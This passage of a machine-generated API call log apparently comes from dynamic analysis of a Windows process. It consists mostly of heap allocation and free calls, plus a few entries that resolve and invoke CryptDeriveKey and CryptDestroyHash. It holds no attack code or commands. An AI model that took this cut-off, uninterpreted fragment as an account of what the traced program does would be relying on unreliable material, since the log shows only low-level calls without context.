hHeap=0x970000) returned 1 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0259.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51e08 [0259.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51e08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.412] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0259.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.413] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f50, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0259.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.414] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0259.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.415] CryptDestroyHash (hHash=0xa86f50) returned 1 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0259.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0259.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.421] RtlAllocateHeap (HeapHandle=0x970000, 